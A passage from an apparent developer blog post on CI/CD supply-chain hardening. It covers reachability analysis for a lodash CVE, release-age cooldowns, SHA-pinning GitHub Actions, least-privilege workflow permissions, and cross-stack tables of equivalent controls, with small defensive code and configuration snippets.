&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rE&lt;/span&gt; &lt;span class="s1"&gt;'_\.template\('&lt;/span&gt; apps/ libs/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing. Across multiple projects, no production source called &lt;code&gt;_.template&lt;/code&gt;. The vulnerable code path was unreachable.&lt;/p&gt;

&lt;p&gt;That grep is a hand-rolled approximation of &lt;strong&gt;reachability analysis&lt;/strong&gt;, the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with &lt;code&gt;taint-tracking&lt;/code&gt; queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.&lt;/p&gt;

&lt;p&gt;The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.&lt;/p&gt;

&lt;p&gt;Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added &lt;code&gt;_.template&lt;/code&gt; to a new feature, in which case the override is no longer safe? Either way, the decision happens. That's the difference between an allowlist with an expiry and an &lt;code&gt;eslint-disable-next-line&lt;/code&gt; that lives forever.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Aggressive controls block legitimate fixes. Calibrate, don't posture.
&lt;/h3&gt;

&lt;p&gt;Started at &lt;code&gt;minimumReleaseAge: 10080&lt;/code&gt; (7 days, pnpm's recommended baseline). Within the hour it blocked &lt;code&gt;postcss@8.5.12&lt;/code&gt;, a CVE patch published four days earlier. Dropped to 3 days.&lt;/p&gt;

&lt;p&gt;The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in &amp;lt;5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). &lt;code&gt;minimumReleaseAge&lt;/code&gt; is a layer, not the wall.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Detection without enforcement is not security.
&lt;/h3&gt;

&lt;p&gt;The week started with the Slack message above. The most striking finding: all the right primitives were already there (Wiz, SonarCloud, Renovate, gitleaks, custom rules), but none of them were blocking merges. Wiz container scans were running with &lt;code&gt;continue-on-error: true || true&lt;/code&gt;. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with &lt;code&gt;--no-verify&lt;/code&gt;. Renovate filed PRs nobody was required to merge.&lt;/p&gt;

&lt;p&gt;Moving those gates into PR-time required-status-checks (same tools, same configurations, just &lt;code&gt;required: true&lt;/code&gt; in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement; we don't have a counterfactual. Take it as senior intuition.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. The blast radius of a CI compromise is usually larger than any application bug.
&lt;/h3&gt;

&lt;p&gt;An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. These controls assume a clean threat model. Both halves of that assumption fail.
&lt;/h3&gt;

&lt;p&gt;Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits. Every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.&lt;/p&gt;




&lt;h2&gt;
  
  
  Process and culture
&lt;/h2&gt;

&lt;p&gt;Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns bound everything else:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CODEOWNERS on every supply-chain surface.&lt;/strong&gt; Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and &lt;code&gt;audit-allowlist.json&lt;/code&gt; itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Allowlists with expiry, never silent ignores.&lt;/strong&gt; Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny as engineering culture.&lt;/strong&gt; &lt;code&gt;permissions: {}&lt;/code&gt; at workflow level. Empty Dockerfile &lt;code&gt;USER&lt;/code&gt; rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When &lt;code&gt;zizmor&lt;/code&gt; flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.&lt;/p&gt;




&lt;h2&gt;
  
  
  What you can ship alone vs. what needs platform
&lt;/h2&gt;

&lt;p&gt;Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half. You eat the friction without the protection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A team can ship alone:&lt;/strong&gt; SHA-pinning their own workflows. Lockfile pins. &lt;code&gt;minimumReleaseAge&lt;/code&gt; in their own pnpm/Renovate config. Logger redaction in their own service. Default-deny &lt;code&gt;permissions:&lt;/code&gt; in their own workflows. Dockerfile non-root.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs platform / security org:&lt;/strong&gt; CODEOWNERS gating across the org. OIDC trust-policy authoring. Branch protection on &lt;code&gt;main&lt;/code&gt;. Admission controllers verifying cosign signatures at deploy time. Log retention infrastructure. Secret rotation runbooks. Cross-repo CI runner isolation.&lt;/p&gt;

&lt;p&gt;If you're a single team and the platform-side controls don't exist yet, the highest-leverage moves are the three that would have stopped both attacks in this article cold: SHA-pin every external &lt;code&gt;uses:&lt;/code&gt;, scope every &lt;code&gt;permissions:&lt;/code&gt; block to least privilege, set &lt;code&gt;minimumReleaseAge&lt;/code&gt; to 3+ days. The first two are local edits. The third is one config line. Together they're roughly two days of work.&lt;/p&gt;
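&lt;p&gt;For the first of those moves, the check is mechanical enough to sketch. &lt;code&gt;pinact&lt;/code&gt; does this properly; the regex and workflow text below are illustrative. Flag any external &lt;code&gt;uses:&lt;/code&gt; whose ref is not a 40-hex-character commit SHA:&lt;/p&gt;

```javascript
// Sketch of a local SHA-pin check: a ref is considered pinned only if it is
// a full 40-hex-char commit SHA; tags and branch names are flagged.
const shaPinned = /^[0-9a-f]{40}$/;

function unpinnedUses(workflowText) {
  const out = [];
  for (const line of workflowText.split("\n")) {
    const m = line.match(/uses:\s*([^\s@]+)@(\S+)/);
    // Skip local actions (./path); flag anything whose ref isn't a SHA.
    if (m && !m[1].startsWith("./") && !shaPinned.test(m[2])) out.push(m[0].trim());
  }
  return out;
}

// Illustrative workflow snippet (the SHA and its tag comment are examples):
const workflow = `
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65 # v4.0.0
`;

console.log(unpinnedUses(workflow)); // only the tag-pinned checkout line
```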




&lt;h2&gt;
  
  
  Translation table: the boundaries in your stack
&lt;/h2&gt;

&lt;p&gt;This article uses pnpm + GitHub Actions because that's where I shipped the work. The boundaries don't care about the YAML.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Boundary&lt;/th&gt;
&lt;th&gt;pnpm/JS&lt;/th&gt;
&lt;th&gt;Python&lt;/th&gt;
&lt;th&gt;Java/Maven&lt;/th&gt;
&lt;th&gt;Go&lt;/th&gt;
&lt;th&gt;Rust&lt;/th&gt;
&lt;th&gt;Ruby&lt;/th&gt;
&lt;th&gt;.NET&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Pin to immutable identifier&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;package.json&lt;/code&gt; exact + &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;pip-compile --generate-hashes&lt;/code&gt; + &lt;code&gt;--require-hashes&lt;/code&gt;; or &lt;code&gt;poetry install --no-update&lt;/code&gt;; or &lt;code&gt;uv sync --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;mvn-dependency-lock-plugin&lt;/code&gt; + &lt;code&gt;dependencies.lock&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;GOFLAGS=-mod=readonly&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Cargo.lock&lt;/code&gt; + &lt;code&gt;cargo --frozen --locked&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Gemfile.lock&lt;/code&gt; + &lt;code&gt;bundle config set frozen true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;packages.lock.json&lt;/code&gt; + &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2. Cooldown on fresh publishes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm-native)&lt;/td&gt;
&lt;td&gt;Renovate &lt;code&gt;minimumReleaseAge&lt;/code&gt; (covers PyPI); commercial: Socket, Phylum&lt;/td&gt;
&lt;td&gt;Renovate (covers Maven Central)&lt;/td&gt;
&lt;td&gt;Renovate (covers Go modules) + &lt;code&gt;govulncheck&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;cargo-deny [advisories] yanked = "deny"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate; &lt;code&gt;bundler-audit&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Renovate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3. Lockfile integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;integrity: sha512:...&lt;/code&gt; per entry&lt;/td&gt;
&lt;td&gt;hash via &lt;code&gt;--require-hashes&lt;/code&gt;; Poetry &lt;code&gt;content-hash&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Gradle &lt;code&gt;verification-metadata.xml&lt;/code&gt;; Maven &lt;code&gt;--strict-checksums&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;go.sum&lt;/code&gt; + &lt;code&gt;sum.golang.org&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Cargo lockfile checksums (built-in)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;bundle config set verify_files true&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet trust&lt;/code&gt; for signed packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config), covering npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter. That's the week.&lt;/p&gt;
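&lt;p&gt;For teams that want the same gate, a minimal sketch of the workflow (trigger and job layout illustrative; assumes &lt;code&gt;pinact&lt;/code&gt; is already installed on the runner, and mirrors the invocation above):&lt;/p&gt;

```yaml
# Required status check: fail any PR that references an action by mutable
# tag instead of by commit SHA.
name: pin-check
on: pull_request
permissions:
  contents: read
jobs:
  pinact:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4   # pin this one by SHA too, in practice
      - run: pinact --check --verify
```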

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one took one commit.&lt;/p&gt;

&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;code&gt;axios@1.14.1&lt;/code&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;
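&lt;p&gt;The second of those three, sketched for GitHub Actions (job name and grants illustrative):&lt;/p&gt;

```yaml
# Default-deny at the workflow root; each job re-grants only what it needs.
permissions: {}

jobs:
  build:
    permissions:
      contents: read    # enough to check out code
      id-token: write   # only if this job signs or assumes a cloud role
    runs-on: ubuntu-latest
    steps:
      - run: echo "least privilege by default"
```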

&lt;p&gt;For a regulated workload (healthcare staffing means downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS), the calibration looks like this: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why, especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
